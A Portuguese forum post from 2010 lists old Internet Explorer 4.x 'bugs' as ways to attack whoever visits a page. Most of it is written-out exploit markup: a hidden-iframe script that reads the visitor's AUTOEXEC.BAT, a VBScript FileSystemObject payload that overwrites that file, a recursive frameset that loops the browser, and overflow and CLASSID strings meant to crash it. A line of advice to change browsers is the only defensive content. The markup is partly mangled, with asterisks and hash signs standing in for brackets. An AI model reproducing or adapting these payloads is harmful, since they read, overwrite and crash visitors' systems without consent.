Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.



 
InícioInício  PortalPortal  Últimas imagensÚltimas imagens  ProcurarProcurar  RegistrarRegistrar  EntrarEntrar  


Compartilhe | 
 

 Bug do Explore

Ver o tópico anterior Ver o tópico seguinte Ir para baixo 
AutorMensagem
Juninho

Juninho

Mensagens : 527
Pontos : 79426
Data de inscrição : 01/09/2010
Idade : 26
Localização : Santa Catarina-Navegantes

Bug do Explore  Empty
MensagemAssunto: Bug do Explore    Bug do Explore  Icon_minitimeQui Set 02, 2010 12:01 am

HeHe é vc pode fazer cada coisa com o cara que estiver usando o explorer que vc nem imagina, dá até pra ver o autoexec do cara. A Micro$oft com a pressa de seus lançamentos fez cada burrada no explorer que descoberta por hackers fez com que desse para explorar todas as falhas com simples scripts. Se vc quer se defender vc tem que tirar o explorer 4.x ou inferior, no 5 as falhas diminuiram bastante mas se vc quer nenhuma falha use o Netscape ou o Opera que são excelentes navegadores. Aí está as falhas do IE:

#BUG 1#
#Esse bug no IE 4, faz com que em 5 segundos o conteudo
do
AUTOEXEC.BAT seja mostrado numa caixa de texto.
Demostrando q se esse
script
for usado para fins maliciosos, dados importantes podem
ser capturados.#
*HTML*
*HEAD*
*TITLE*
*/TITLE*
*/HEAD*
*BODY onLoad="init()"*
*SCRIPT LANGUAGE="JavaScript"*
function init()
{
document.all("MyFrame1").src = 'file://c:/autoexec.bat';
setTimeout ('getLinks()', 5000);
}

function getLinks()
{alert(document.all("MyFrame1").document.body.outerHTML);
}

*/SCRIPT*
*IFRAME STYLE="width=1px; height=1px;" NAME="MyFrame1"
SRC="blank.html"*
*/BODY*
*/HTML*

-----------------------------------------------

BUG 2#
Faz com que o IE entre em loop, abrindo a pagina bug.htm
infinitamente. Causando o seu travamento.
*HTML*
*HEAD*
*TITLE*
*/TITLE*
*/HEAD*
*FRAMESET ROWS = 50%,50%* v
*FRAME SRC = "bug.htm"*
*FRAME SRC = "bug.htm"*

*/FRAMESET*



*BODY*
*/BODY>
*/HTML>

------------------------------------------

#BUG 3# Vulnerable : IE 4.x e VBScript Engine 3.x
Descricao: Com essa falha de seguranca na linguagem VBScript, vc
pode
rodar scripts maliciosos para sobreescrever arquivos.
*HTML>
*HEAD> */HEAD>
*BODY>*SCRIPT LANGUAGE="VBSCRIPT">

Set fs = CreateObject#"Scripting.FileSystemObject" #
Set a = fs.CreateTextFile#"C:\AUTOEXEC.BAT", True #
a.WriteLine#"@echo off"#
a.WriteLine#"echo This is a test."#
a.WriteLine#"pause"#
a.WriteLine#"@echo on"#
a.Close

*/SCRIPT>

O seu arquivo "AUTOEXEC.BAT" foi sobreescrito!

*/BODY>
*/HTML>

---------------------------------------------------

#BUG 4#
Vulnerable : IE 4.0
Descricao: Causa overflow no IE, e como decorrente o seu travamento.

*HTML>
SuCkEr!!!
*EMBED
SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789

01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456

7890123456789012345678901234567890123456789>


40
80
160 170 180
190 200
*/HTML>
------------------------------------------------

#BUG 7#

>>>Funciona com: IE 4.0
>>>Descricao: dah uma mensagem de Operacaum Ilegal e
fecha o browser ou
uma
tela azul de Erro Fatal e vc terah que rebootar a
maquina.
Trying to crash IE 4.0
CLASSID=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

111>
Ir para o topo Ir para baixo
http://www.juninnnxd.blogspot.com
 

Bug do Explore

Ver o tópico anterior Ver o tópico seguinte Ir para o topo 
Página 1 de 1

Permissões neste sub-fórumNão podes responder a tópicos
 :: Consoles :: PC-
Ir para:  

Total De Visitas desde 21/07/2008

Contador de visitas
Forumeiros.com | ©phpBB | Fórum gratuito de ajuda | Denunciar um abuso | Cookies | Fórum grátis